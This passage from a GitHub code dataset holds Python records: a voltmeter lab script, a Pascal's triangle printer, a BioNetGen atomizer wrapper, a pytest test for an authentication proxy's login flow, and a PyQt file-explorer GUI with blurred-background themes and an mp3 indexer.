360])\n\nwith open('datapointsIRV.txt', 'w') as f:\n for i in range(U_list.size):\n f.write(\"%g \\t %g\\n\" % (t_list[i], log(U_list[i])))\n\ntau = -1.0/((log(U_list[-1]) - log(U_list[0]))/float(t_list[-1] - t_list[0]))\n\nwith open(\"InnerRV.txt\", 'w') as f:\n f.write(\"Tau is equal to: %g s\\\\\\\\ \\n\" % tau)\n f.write(\"Inner resistance: %g ohm\" % (tau/float(8.3e-6)))\n\nEP = EvaluatePoints('datapointsIRV.txt')\nEP.storeValues()\nEP.interpolate(2, 0)\nEP.plotPoints(\"Inner resistance of Voltmeter.\", \"InnerRV.png\", \"t [s]\", \"V [V]\")\n","repo_name":"moncar/FYS1120","sub_path":"Lab/GrunnleggjandeEMM/src/Oppgave1.1.py","file_name":"Oppgave1.1.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8034119696","text":"from math import *\n\nn = 15\nfor j in range(n):\n l = []\n for i in range(n):\n if j < i:\n break\n l.append(int(factorial(j) / (factorial(i) * factorial(j - i))))\n print(*l)","repo_name":"kliashenko001/Algorithms","sub_path":"pascal.py","file_name":"pascal.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18246164154","text":"import bionetgen.atomizer.libsbml2bngl as ls2b\nfrom bionetgen.core.defaults import BNGDefaults\nimport yaml, os\n\nd = BNGDefaults()\n\n\nclass AtomizeTool:\n def __init__(self, input_file=None, options_dict=None, parser_namespace=None):\n # we generate our defaults first and override it with\n # the dictionary first and then the namespace\n config = {\n \"input\": None, # we need this, check at the end and fail if we don't have it\n \"annotation\": False,\n \"output\": None,\n \"convention_file\": None,\n \"naming_conventions\": None,\n \"user_structures\": None,\n \"molecule_id\": False,\n \"convert_units\": False, # currently not supported\n \"atomize\": False, # default is flat translation\n \"pathwaycommons\": True, # requires connection so default is false\n \"bionetgen_analysis\": os.path.join(\n d.bng_path, \"BNG2.pl\"\n ), # TODO: get it from app config\n 
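# the keys below keep their defaults unless overridden, first by\n            # options_dict and then by parser_namespace (handled right after this dict)\n            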
\"isomorphism_check\": False, # wtf do we do here?\n \"ignore\": False, # wtf do we do here?\n \"memoized_resolver\": False,\n \"keep_local_parameters\": False,\n \"quiet_mode\": False,\n \"obs_map_file\": None,\n \"log_level\": \"DEBUG\", # options are \"CRITICAL\", \"ERROR\", \"WARNING\", \"INFO\", \"DEBUG\"\n }\n # input file\n if input_file is not None:\n config[\"input\"] = input_file\n # dictionary override\n if options_dict is not None:\n for key in config:\n if key in options_dict:\n config[key] = options_dict[key]\n # namespace override\n if parser_namespace is not None:\n for key in config:\n if hasattr(parser_namespace, key):\n config[key] = getattr(parser_namespace, key)\n self.config = self.checkConfig(config)\n\n def checkConfig(self, config):\n options = {}\n options[\"inputFile\"] = config[\"input\"] # TODO: ensure this is not None\n conv, useID, naming = ls2b.selectReactionDefinitions(options[\"inputFile\"])\n options[\"outputFile\"] = (\n config[\"output\"]\n if config[\"output\"] is not None\n else options[\"inputFile\"] + \".bngl\"\n )\n options[\"conventionFile\"] = (\n config[\"convention_file\"] if config[\"convention_file\"] is not None else conv\n )\n options[\"userStructure\"] = config[\"user_structures\"]\n options[\"namingConventions\"] = (\n config[\"naming_conventions\"]\n if config[\"naming_conventions\"] is not None\n else naming\n )\n options[\"useId\"] = config[\"molecule_id\"]\n options[\"annotation\"] = config[\"annotation\"]\n options[\"atomize\"] = config[\"atomize\"]\n options[\"pathwaycommons\"] = config[\"pathwaycommons\"]\n options[\"bionetgenAnalysis\"] = config[\"bionetgen_analysis\"]\n options[\"isomorphismCheck\"] = config[\"isomorphism_check\"]\n options[\"ignore\"] = config[\"ignore\"]\n options[\"noConversion\"] = not config[\"convert_units\"]\n options[\"memoizedResolver\"] = config[\"memoized_resolver\"]\n options[\"replaceLocParams\"] = not config[\"keep_local_parameters\"]\n options[\"quietMode\"] = config[\"quiet_mode\"]\n options[\"obs_map_file\"] = config[\"obs_map_file\"]\n assert config[\"log_level\"] in [\n \"CRITICAL\",\n \"ERROR\",\n \"WARNING\",\n \"INFO\",\n \"DEBUG\",\n ], \"Logging level {} is not an allowed level\".format(config[\"log_level\"])\n options[\"logLevel\"] = config[\"log_level\"]\n return options\n\n def run(self):\n self.returnArray = ls2b.analyzeFile(\n self.config[\"inputFile\"],\n self.config[\"conventionFile\"],\n self.config[\"useId\"],\n self.config[\"namingConventions\"],\n self.config[\"outputFile\"],\n speciesEquivalence=self.config[\"userStructure\"],\n atomize=self.config[\"atomize\"],\n bioGrid=False,\n pathwaycommons=self.config[\"pathwaycommons\"],\n ignore=self.config[\"ignore\"],\n noConversion=self.config[\"noConversion\"],\n memoizedResolver=self.config[\"memoizedResolver\"],\n replaceLocParams=self.config[\"replaceLocParams\"],\n quietMode=self.config[\"quietMode\"],\n logLevel=self.config[\"logLevel\"],\n obs_map_file=self.config[\"obs_map_file\"],\n )\n try:\n if self.config[\"bionetgenAnalysis\"] and self.returnArray:\n ls2b.postAnalyzeFile(\n self.config[\"outputFile\"],\n self.config[\"bionetgenAnalysis\"],\n self.returnArray.database,\n replaceLocParams=self.config[\"replaceLocParams\"],\n obs_map_file=self.config[\"obs_map_file\"],\n )\n except Exception as e:\n print(\"Post analysis failed\")\n print(e)\n\n try:\n if self.config[\"annotation\"] and self.returnArray:\n with open(self.config[\"outputFile\"] + \".yml\", \"w\") as f:\n f.write(\n yaml.dump(self.returnArray.annotation, 
default_flow_style=False)\n )\n except Exception as e:\n print(\"annotation file writing failed\")\n print(e)\n return self.returnArray\n","repo_name":"ASinanSaglam/PyBioNetGen","sub_path":"bionetgen/atomizer/atomizeTool.py","file_name":"atomizeTool.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"33615497912","text":"import pytest\n\n\nAM_ROUTE_RULES = [\n {\n 'input': {\n 'description': '(imported from taxi config)',\n 'maintained_by': 'eats_common_components',\n 'prefix': '/test',\n 'priority': 100,\n 'rule_name': '/test',\n },\n 'output': {\n 'attempts': 1,\n 'rewrite_path_prefix': '/test',\n 'timeout_ms': 100,\n 'tvm_service': 'mock',\n 'upstream': {'$mockserver': ''},\n },\n 'proxy': {\n 'auth_type': 'session',\n 'cookie_webview_enabled': False,\n 'passport_scopes': [],\n 'proxy_cookie': [],\n 'personal': {\n 'eater_id': True,\n 'eater_uuid': True,\n 'email_id': True,\n 'phone_id': True,\n },\n 'proxy_401': False,\n },\n 'rule_type': 'eats-authproxy',\n },\n]\n\n\n@pytest.mark.parametrize(\n 'ea_login_answer', ['TimeoutError', 'NetworkError', 'Response403', 'OK'],\n)\n@pytest.mark.parametrize('try_to_use_eater_from_eaters', [True, False])\n@pytest.mark.passport_token(token={'uid': '100', 'scope': 'eats:all'})\n@pytest.mark.eater_session(outer={'inner': 'in'})\n@pytest.mark.eater(\n u100={\n 'id': '100',\n 'personal_phone_id': 'p100',\n 'personal_email_id': 'e100',\n },\n)\n@pytest.mark.routing_rules(AM_ROUTE_RULES)\nasync def test_login_in_ea(\n taxi_eats_authproxy,\n mockserver,\n mock_eater_authorizer,\n mock_core_eater,\n blackbox_service,\n request_proxy,\n ea_login_answer,\n taxi_config,\n try_to_use_eater_from_eaters,\n):\n config = taxi_config.get('EATS_AUTHPROXY_FEATURE_FLAGS')\n config['try_to_use_eater_from_eaters'] = try_to_use_eater_from_eaters\n taxi_config.set_values({'EATS_AUTHPROXY_FEATURE_FLAGS': config})\n await taxi_eats_authproxy.invalidate_caches()\n\n @mockserver.json_handler('test/123')\n def _mock_backend(request):\n if try_to_use_eater_from_eaters:\n assert (\n set(\n x.strip()\n for x in request.headers['X-Eats-User'].split(',')\n )\n == set(\n [\n 'user_id=100',\n 'personal_phone_id=p100',\n 'personal_email_id=e100',\n 'eater_uuid=100',\n ],\n )\n )\n else:\n assert 'X-Eats-User' not in request.headers\n\n @mockserver.json_handler('/eater-authorizer/v1/eater/sessions/login')\n def _mock_login(request):\n assert request.json['eater_id'] == '100'\n assert request.json['inner_session_id'] == 'in'\n\n if ea_login_answer == 'TimeoutError':\n raise mockserver.TimeoutError()\n elif ea_login_answer == 'NetworkError':\n raise mockserver.NetworkError()\n elif ea_login_answer == 'Response403':\n return mockserver.make_response('bad request', status=403)\n elif ea_login_answer == 'OK':\n pass\n\n return 'ok'\n\n response = await request_proxy('token', headers={'Origin': 'yandex.ru'})\n assert response.status_code == 200\n assert _mock_backend.times_called == 1\n assert _mock_login.times_called > 0 # retries\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_eats_authproxy/test_login_in_ea.py","file_name":"test_login_in_ea.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19271928334","text":"from random import randint\r\nfrom threading import Thread, Timer\r\nimport pygetwindow\r\nfrom PIL import Image # pip install pillow\r\nfrom 
PIL.ImageFilter import *\r\nfrom PyQt5.QtCore import * # pip install PyQt5\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtWebEngineWidgets import * # search for it\r\nfrom PyQt5.QtWidgets import *\r\nfrom pyautogui import *\r\nfrom win32api import *\r\nfrom win10toast import ToastNotifier\r\nimport keyboard\r\nfrom PyQt5 import QtWidgets, QtCore, QtGui, uic\r\nfrom pygame import mixer, error, USEREVENT, event\r\nfrom mutagen.mp3 import MP3, HeaderNotFoundError, MutagenError\r\n\r\n# constants\r\nWIDTH_ = GetSystemMetrics(0)\r\nHEIGHT_ = GetSystemMetrics(1)\r\nUSER = GetUserName()\r\nPATH_ = \"\"\r\n# may be i not pretty\r\nif not os.path.isdir(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache'):\r\n os.makedirs(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache')\r\n\r\n\r\nclass BlurEffect(QtWidgets.QGraphicsBlurEffect):\r\n effectRect = None\r\n\r\n def setEffectRect(self, rect):\r\n self.effectRect = rect\r\n self.update()\r\n\r\n def draw(self, qp):\r\n if self.effectRect is None or self.effectRect.isNull():\r\n # no valid effect rect to be used, use the default implementation\r\n super().draw(qp)\r\n\r\n else:\r\n qp.save()\r\n # clip the drawing so that it's restricted to the effectRect\r\n qp.setClipRect(self.effectRect)\r\n # call the default implementation, which will draw the effect\r\n super().draw(qp)\r\n # get the full region that should be painted\r\n fullRegion = QtGui.QRegion(qp.viewport())\r\n # and subtract the effect rectangle\r\n fullRegion -= QtGui.QRegion(self.effectRect)\r\n qp.setClipRegion(fullRegion)\r\n # draw the *source*, which has no effect applied\r\n self.drawSource(qp)\r\n qp.restore()\r\n\r\n\r\nclass Main(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n self.value = False\r\n self.setMinimumSize(int(WIDTH_ / 1.2), int(HEIGHT_ / 1.2))\r\n self.setWindowFlag(Qt.FramelessWindowHint)\r\n self.setAttribute(Qt.WA_TranslucentBackground)\r\n self.setAutoFillBackground(True)\r\n self.username = GetUserName()\r\n\r\n\r\n # # UI Setup\r\n self.ui = uic.loadUi(\"D:/file_explorer_ui/UPDATE4.ui\", self)\r\n self.show()\r\n\r\n # radio button manager\r\n with open(\"lib.dll\", \"r\") as reader:\r\n read = str(reader.read())\r\n\r\n # combobox manager\r\n with open('rep32.dll', 'r') as theme_reader:\r\n read_theme = theme_reader.read()\r\n\r\n if read == \"True\":\r\n self.effect_radiobutton.setChecked(True)\r\n self.set_acrylic(True, \"set_all\")\r\n else:\r\n self.effect_radiobutton.setChecked(False)\r\n self.set_acrylic(False, \"dark\")\r\n print('dark')\r\n\r\n if read_theme == 'acrylic':\r\n self.theme_box.setCurrentIndex(1)\r\n elif read_theme == 'transparent':\r\n self.theme_box.setCurrentIndex(2)\r\n elif read_theme == 'blur':\r\n self.theme_box.setCurrentIndex(3)\r\n elif read_theme == 'light':\r\n self.theme_box.setCurrentIndex(4)\r\n elif read_theme == 'dark':\r\n self.theme_box.setCurrentIndex(5)\r\n elif read_theme == 'amoled':\r\n self.theme_box.setCurrentIndex(6)\r\n elif read_theme == 'default':\r\n self.theme_box.setCurrentIndex(0)\r\n # self.setupUi(self)\r\n self.functionalities()\r\n self.setGeometry(int(WIDTH_ / 12), int(HEIGHT_ / 16), int(WIDTH_ / 1.14), int(HEIGHT_ / 1.19))\r\n self.showMaximized()\r\n\r\n get_image = screenshot()\r\n r = str(randint(10, 100000))\r\n with open(\"assets/resources/holder.tru\", 'w') as hold:\r\n hold.write(r)\r\n\r\n try:\r\n get_image.save(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_ref{r}.jpeg')\r\n frame_one_image = 
Image.open(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_ref{r}.jpeg')\r\n skinned_ = Image.eval(frame_one_image, lambda x: x / 2)\r\n frame_one_blurred_image = skinned_.filter(GaussianBlur(radius=3))\r\n frame_one_blurred_image.save(f\"C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_reb1{r}.jpeg\")\r\n except FileNotFoundError:\r\n pass\r\n\r\n if self.isMaximized():\r\n self.setWindowOpacity(1.0)\r\n\r\n # FRAMES UI\r\n\r\n # FRAME 1\r\n try:\r\n self.graphics.setStyleSheet(f\"\"\"\r\n background: url(C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_reb1{r}.jpeg);\r\n background-repeat: repeat;\r\n background-position: left;\r\n border: 0;\"\"\")\r\n\r\n\r\n except FileNotFoundError:\r\n pass\r\n\r\n # self.mainlayout = QtWidgets.QVBoxLayout(self)\r\n # self.mainlayout.setContentsMargins(0, 0, 0, 0)\r\n #\r\n # self.subWidget = QtWidgets.QWidget()\r\n # self.mainlayout.addWidget(self.subWidget)\r\n #\r\n # self.effect = BlurEffect()\r\n #\r\n # self.subWidget.setGraphicsEffect(self.effect)\r\n # self.effect.setEnabled(True)\r\n # self.effect.setBlurRadius(40)\r\n #\r\n # self.menu = QtWidgets.QWidget(self)\r\n # self.menu.setVisible(False)\r\n # self.menu.setFixedWidth(300)\r\n # self.menu.move(-self.menu.width(), 0)\r\n #\r\n # self.menuLayout = QtWidgets.QVBoxLayout(self.menu)\r\n #\r\n # self.menuAnimation = QtCore.QVariantAnimation()\r\n # self.menuAnimation.setDuration(400)\r\n # self.menuAnimation.setEasingCurve(QtCore.QEasingCurve.OutQuart)\r\n # self.menuAnimation.setStartValue(-self.menu.width())\r\n # self.menuAnimation.setEndValue(0)\r\n #\r\n #\r\n # def openMenu(self):\r\n # # if self.menu.x() >= 0:\r\n # # # the menu is already visible\r\n # # return\r\n # # ensure that the menu starts hidden (that is, with its right border\r\n # # aligned to the left of the main widget)\r\n # self.menu.move(-self.menu.width(), 0)\r\n # self.menu.setVisible(True)\r\n # self.menu.setFocus()\r\n #\r\n # # enable the effect, set the forward direction for the animation, and\r\n # # start it; it's important to set the effect rectangle here too, otherwise\r\n # # some flickering might show at the beginning\r\n # self.effect.setEffectRect(self.menu.geometry())\r\n # self.effect.setEnabled(True)\r\n # self.menuAnimation.setDirection(QtCore.QVariantAnimation.Forward)\r\n # self.menuAnimation.start()\r\n # print(\"Trying ..\")\r\n def set_acrylic(self, val=True or False, *args):\r\n if val:\r\n for i in args:\r\n if i == \"set_all\":\r\n self.all_frame.setStyleSheet(f\"\"\"background: transparent;\"\"\")\r\n self.window_frame.setStyleSheet(f\"\"\"background: transparent;\"\"\")\r\n self.graphics.setStyleSheet(f\"\"\"background: transparent;\"\"\")\r\n\r\n with open(\"assets/resources/holder.tru\", \"r\") as reader:\r\n r = str(reader.read())\r\n self.all_frame.setStyleSheet(f\"\"\"\r\n background: transparent;\r\n background: url('C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_reb1{r}.jpeg');\r\n background-repeat: no-repeat;\r\n background-position: left;\r\n border: 0;\"\"\")\r\n\r\n if i == \"set_on_left\" or i == 'default':\r\n\r\n with open(\"assets/resources/holder.tru\", \"r\") as reader:\r\n r = str(reader.read())\r\n self.all_frame.setStyleSheet(f\"\"\"\r\n background: url('C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_reb1{r}.jpeg');\r\n background-repeat: no-repeat;\r\n background-position: left;\r\n border: 0;\"\"\")\r\n self.window_frame.setStyleSheet(\"background: black;\")\r\n\r\n if i == \"set_on_right\":\r\n with 
open(\"assets/resources/holder.tru\", \"r\") as reader:\r\n r = str(reader.read())\r\n self.window_frame.setStyleSheet(f\"\"\"\r\n background: transparent;\r\n background: url('C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_reb1{r}.jpeg');\r\n background-repeat: no-repeat;\r\n background-position: left;\r\n border: 0;\"\"\")\r\n\r\n return\r\n else:\r\n for i in args:\r\n if i == \"amoled\":\r\n self.all_frame.setStyleSheet(\"\"\"background: black;\"\"\")\r\n self.window_frame.setStyleSheet(\"\"\"background: black;\"\"\")\r\n self.graphics.setStyleSheet(\"\"\"background: black;\"\"\")\r\n if i == \"dark\":\r\n self.all_frame.setStyleSheet(f\"\"\"background: rgb(40, 40, 40);\"\"\")\r\n self.window_frame.setStyleSheet(f\"\"\"background: rgb(40, 40, 40);\"\"\")\r\n self.graphics.setStyleSheet(f\"\"\"background: rgb(30, 30, 30);\"\"\")\r\n if i == \"light\":\r\n self.all_frame.setStyleSheet(f\"\"\"\r\n background: rgb(255, 255, 255);\r\n color: rgb(0, 0, 0)\"\"\")\r\n if i == \"transparent\":\r\n self.all_frame.setStyleSheet(f\"\"\"background: \ttransparent;\"\"\")\r\n self.window_frame.setStyleSheet(f\"\"\"background: transparent;\"\"\")\r\n self.graphics.setStyleSheet(f\"\"\"background: transparent;\"\"\")\r\n if i == 'semi-transparent':\r\n self.all_frame.setStyleSheet(f\"\"\"background: rgba(0, 0, 0, 128);\"\"\")\r\n self.window_frame.setStyleSheet(f\"\"\"background: rgba(0, 0, 0, 128);\"\"\")\r\n self.graphics.setStyleSheet(f\"\"\"background: rgba(0, 0, 0, 128);\"\"\")\r\n self.setWindowOpacity(0.8)\r\n\r\n def setup_elegantUi(self):\r\n if self.isMaximized():\r\n if self.effect_radiobutton.isChecked():\r\n self.set_acrylic(True, \"set_all\")\r\n with open(\"lib.dll\", \"w\") as writer:\r\n writer.write(\"True\")\r\n else:\r\n self.set_acrylic(False, 'dark')\r\n with open(\"lib.dll\", \"w\") as writer:\r\n writer.write(\"False\")\r\n\r\n def slideMenu(self, value= True or False):\r\n width = self.graphics.width()\r\n\r\n\r\n if value:\r\n # decrease the slide menu size\r\n\r\n # set name\r\n self.collapse.setText(\"\")\r\n self.search_box.setVisible(False)\r\n # self.search.setMaximumWidth(20)\r\n self.search.setStyleSheet(\"\"\"\r\n QPushButton{\r\ncolor: white;\r\nbackground: transparent;\r\npadding-right: 5px;\r\n\t\r\n}\r\n\r\nQPushButton::hover{\r\n\tcolor: white;\r\n\tbackground-color : rgba(255, 255 ,255 ,50);\r\n\r\n}\r\n\r\nQPushButton::pressed{\r\n\tbackground-color: rgba(255, 255, 255, 80)\r\n}\r\n \"\"\")\r\n\r\n #\r\n # if width == 380:\r\n # new_width = 45\r\n # else:\r\n # new_width = 380\r\n #\r\n #\r\n # self.animation = QtCore.QPropertyAnimation(self.graphics, b\"maximumWidth\", self)\r\n # self.animation.setStartValue(width)\r\n # self.animation.setEndValue(new_width)\r\n # self.animation.setEasingCurve(QtCore.QEasingCurve.InOutQuart)\r\n # self.animation.setDuration(200)\r\n # self.animation.start()\r\n\r\n self.graphics.setMaximumWidth(10)\r\n self.graphics.setMinimumWidth(45)\r\n\r\n self.gdrive_line.setVisible(False)\r\n self.settings_line.setVisible(False)\r\n\r\n\r\n\r\n return -1\r\n\r\n else:\r\n # increae the size\r\n # set name\r\n self.collapse.setText(\" Fluent Explorer\")\r\n self.search.setStyleSheet(\"\"\"\r\n QPushButton{\r\n color: white;\r\n background: transparent;\r\n padding-right: 5px;\r\n }\r\n \"\"\")\r\n\r\n # if width == 45:\r\n # new_width = 380\r\n # else:\r\n # new_width = 45\r\n #\r\n #\r\n # self.animation_down = QtCore.QPropertyAnimation(self.graphics, b\"minimumWidth\", self)\r\n # self.animation_down.setStartValue(45)\r\n # 
self.animation_down.setEndValue(350)\r\n # self.animation_down.setEasingCurve(QtCore.QEasingCurve.InElastic)\r\n # self.animation_down.setDuration(200)\r\n # self.animation_down.start()\r\n #\r\n # print(\"Down Width : \", width)\r\n\r\n # self.search.setMaximumWidth(200)\r\n self.graphics.setMaximumWidth(380)\r\n self.graphics.setMinimumWidth(350)\r\n\r\n self.search_box.setVisible(True)\r\n self.gdrive_line.setVisible(True)\r\n self.settings_line.setVisible(True)\r\n # self.search_clear.setVisible(True)\r\n\r\n def menu_handler(self):\r\n\r\n with open(\"assets/resources/Core.dll\", \"r\") as reader:\r\n read = reader.read()\r\n\r\n if read == \"True\":\r\n self.slideMenu(False)\r\n with open(\"assets/resources/Core.dll\", \"w\") as writer:\r\n writer.write(\"False\")\r\n\r\n self.search.clicked.connect(lambda: self.slideMenu(False))\r\n\r\n else:\r\n self.slideMenu(True)\r\n with open(\"assets/resources/Core.dll\", \"w\") as writer:\r\n writer.write(\"True\")\r\n\r\n def fluentHandler(self):\r\n # FRAME 1\r\n with open(\"assets/resources/holder.tru\", \"r\") as reader_:\r\n r = str(reader_.read())\r\n\r\n self.graphics.setStyleSheet(f\"\"\"\r\n background: url(C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_reb1{r}.jpeg);\r\n background-repeat: repeat;\r\n background-position: left;\r\n border: 0;\"\"\")\r\n\r\n def min(self):\r\n self.showMinimized()\r\n\r\n def max_reduce(self):\r\n if self.isMaximized():\r\n self.showNormal()\r\n icon = QIcon()\r\n icon.addFile(\"assets/resources/images/maximize.png\", QSize(), QIcon.Normal, QIcon.Off)\r\n self.maximize.setIcon(icon)\r\n\r\n self.set_acrylic(True)\r\n else:\r\n self.showMaximized()\r\n icon = QIcon()\r\n icon.addFile(\"assets/resources/images/estore.png\", QSize(), QIcon.Normal, QIcon.Off)\r\n self.maximize.setIcon(icon)\r\n self.set_acrylic(True)\r\n\r\n def stop(self):\r\n app.closeAllWindows()\r\n sys.exit()\r\n\r\n# ################################################### Main UI ######################################################\r\n # ************************* This Pc *************************** #\r\n def thisPC_UI(self):\r\n drives = GetLogicalDriveStrings()\r\n lst = []\r\n for i in drives:\r\n if str(i).isalpha():\r\n lst.append(\" \" + i)\r\n\r\n for i in range(len(lst)):\r\n pushbuton = QPushButton(f\"{lst[i]}\")\r\n pushbuton.setMinimumSize(150, 45)\r\n # pushbuton.setMaximumWidth(200)\r\n\r\n pushbuton.setFont(QFont(\"Segoe UI\", 16))\r\n\r\n if lst[i] == \" C\":\r\n pushbuton.setIcon(QIcon(\"assets/resources/images/drive.png\"))\r\n pushbuton.setIconSize(QSize(25, 25))\r\n pushbuton.setStyleSheet(\"\"\"\r\n QPushButton{\r\n color: white;\r\n background: transparent;\r\n text-align: left;\r\n align: left;\r\n padding-left: 25px;\r\n }\r\n \r\n QPushButton::hover{\r\n color: white;\r\n background-color : rgba(255, 255 ,255 ,50);\r\n \r\n }\r\n \r\n QPushButton::pressed{\r\n background-color: rgba(255, 255, 255, 80)\r\n }\r\n\"\"\")\r\n self.drives_layout.addWidget(pushbuton)\r\n # self.drives_layout.addWidget()\r\n\r\n # ************************* MUSIC ***************************** #\r\n\r\n def music_indexer(self, *args):\r\n from random import choice\r\n # provide te choice\r\n t = ('Please wait while we take care of few things.', 'Indexing will help to search entire drive faster.',\r\n 'Some changes have been found since last run. 
Please wait while we index.')\r\n\r\n def toast_r():\r\n # show toast\r\n try:\r\n ToastNotifier().show_toast(title='Indexing Musics in Local Drives.',\r\n msg=choice(t),\r\n duration=7,\r\n icon_path='Graphics/Elements/icon.ico')\r\n except (AttributeError, RuntimeError, AssertionError):\r\n pass\r\n\r\n Thread(target=toast_r).start()\r\n\r\n # def assist():\r\n # try:\r\n # loader = MP3(\"Assist/indexing.mp3\")\r\n # mixer.init(frequency=loader.info.sample_rate)\r\n # mixer.music.load(\"Assist/indexing.mp3\")\r\n # mixer.music.play()\r\n # except error:\r\n # pass\r\n # except Exception:\r\n # pass\r\n #\r\n # Thread(target=assist).start()\r\n\r\n # main indexer to find the mp3 file\r\n musics = open(f'C:/Users/{GetUserName()}/AppData/Local/Temp/CachedData/mr.tru', 'w')\r\n path = open(f'C:/Users/{GetUserName()}/AppData/Local/Temp/CachedData/mp.tru', 'w')\r\n\r\n # walker\r\n for v in os.walk(r'C:/Users'):\r\n for g in v[2]:\r\n try:\r\n if g.endswith('.mp3'):\r\n musics.write(f'{g}\\n')\r\n path.write(f'{v[0]}\\n')\r\n except UnicodeEncodeError:\r\n pass\r\n\r\n new_songs = 0\r\n # # new drive walker\r\n # for i in range(current_active - 1):\r\n # for e in get_active_drives[1:current_active]:\r\n # walker_drives = os.walk(f'{e}')\r\n # for z in walker_drives:\r\n # for r in z[2]:\r\n # try:\r\n # if r.endswith('.mp3'):\r\n # f.write(f'{r}\\n')\r\n # reviser.write(f'{z[0]}\\n')\r\n # new_songs += 1\r\n # except UnicodeEncodeError:\r\n # pass\r\n # save and close the file\r\n musics.close()\r\n path.close()\r\n\r\n # with open('Asse', 'w') as ne:\r\n # ne.write('False')\r\n\r\n # with open(f'C:/Users/{GetUserName()}/Fluent Player+/temp/Assets/optimizer.tru', \"r\") as optimize:\r\n # reader = optimize.read()\r\n #\r\n # if reader == \"True\":\r\n # try:\r\n # ToastNotifier().show_toast(title=f\"Added {new_songs} songs into library.\",\r\n # msg=f\"We have found {new_songs} in your device and added to library. 
\",\r\n # duration=14,\r\n # icon_path=\"Graphics/Elements/icon.ico\")\r\n # except (RuntimeError, AttributeError, AssertionError):\r\n # pass\r\n with open(f'C:/Users/{GetUserName()}/AppData/Local/Temp/CachedData/optimizer.tru', \"w\") as optimization:\r\n optimization.write(\"False\")\r\n\r\n def music_UI(self):\r\n if not os.path.isfile(f'C:/Users/{GetUserName()}/AppData/Local/Temp/CachedData/mr.tru'):\r\n Thread(target=self.music_indexer)\r\n\r\n read_music = open(f'C:/Users/{GetUserName()}/AppData/Local/Temp/CachedData/mr.tru', 'r').readlines()\r\n\r\n total = 0\r\n\r\n for i in read_music:\r\n total += 1\r\n print('Total Songs : ', total)\r\n\r\n for i in range(total):\r\n for z in read_music:\r\n print(z)\r\n # songs_button = QPushButton(text=str(z))\r\n # songs_button.setMaximumHeight(45)\r\n # songs_button.setStyleSheet(\"\"\"\r\n # QPushButton{\r\n # color: white;\r\n # background: transparent;\r\n # text-align: left;\r\n # padding-left: 10px;\r\n # }\r\n #\r\n # QPushButton::hover{\r\n # color: white;\r\n # background-color : rgba(255, 255 ,255 ,50);\r\n #\r\n # }\r\n #\r\n # \"\"\")\r\n item = QListWidgetItem('akash')\r\n self.song_view.addItem(item)\r\n\r\n\r\n def clear_search(self):\r\n self.search_box.setText('')\r\n\r\n def functionalities(self):\r\n\r\n # Title bar buttons\r\n # self.close.clicked.connect(self.stop)\r\n self.music.clicked.connect(self.music_UI)\r\n self.minimize.clicked.connect(self.min)\r\n self.maximize.clicked.connect(self.max_reduce)\r\n self.collapse.clicked.connect(self.menu_handler)\r\n self.close.clicked.connect(self.stop)\r\n self.thisPC.clicked.connect(self.thisPC_UI)\r\n # self.search_clear.clicked.connect(self.clear_search)\r\n # self.downloads.clicked.connect(self.downloads_UI)\r\n self.effect_radiobutton.toggled.connect(self.setup_elegantUi)\r\n self.theme_box.activated.connect(self.theme_manager)\r\n\r\n def themeRegistry(self, theme='acrylic'):\r\n with open('rep32.dll', 'w') as theme_writer:\r\n theme_writer.write(theme)\r\n\r\n def setTheme(self):\r\n with open('rep32.dll', 'r') as reader:\r\n read = reader.read()\r\n\r\n if read == 'dark':\r\n self.set_acrylic(False, 'dark')\r\n elif read == 'amoled':\r\n self.set_acrylic(False, 'amoled')\r\n elif read == 'acrylic':\r\n if self.effect_radiobutton.isChecked():\r\n self.set_acrylic(True, 'set_all')\r\n else:\r\n self.set_acrylic(True, 'set_on_left')\r\n elif read == 'blur':\r\n if self.effect_radiobutton.isChecked():\r\n self.set_acrylic(True, 'set_all')\r\n else:\r\n self.set_acrylic(True, 'set_on_left')\r\n elif read == 'default':\r\n self.set_acrylic(True, 'default')\r\n\r\n def theme_manager(self):\r\n\r\n if self.theme_box.currentText() == 'Dark':\r\n self.set_acrylic(False, 'dark')\r\n self.themeRegistry('dark')\r\n\r\n elif self.theme_box.currentText() == 'Blur':\r\n with open('effectSupport.dll', 'w') as writer:\r\n writer.write('ten')\r\n self.themeRegistry('blur')\r\n\r\n with open(\"assets/resources/holder.tru\", 'r') as val:\r\n r = val.read()\r\n # Frame One UI\r\n frame_one_image = Image.open(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_ref{r}.jpeg')\r\n skinned_ = Image.eval(frame_one_image, lambda x: x / 2.2)\r\n\r\n frame_one_blurred_image = skinned_.filter(GaussianBlur(radius=10))\r\n frame_one_blurred_image.save(f\"C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_rea.jpeg\")\r\n\r\n if self.effect_radiobutton.isChecked():\r\n self.set_acrylic(False, 'transparent')\r\n self.all_frame.setStyleSheet(f\"\"\"\r\n background: 
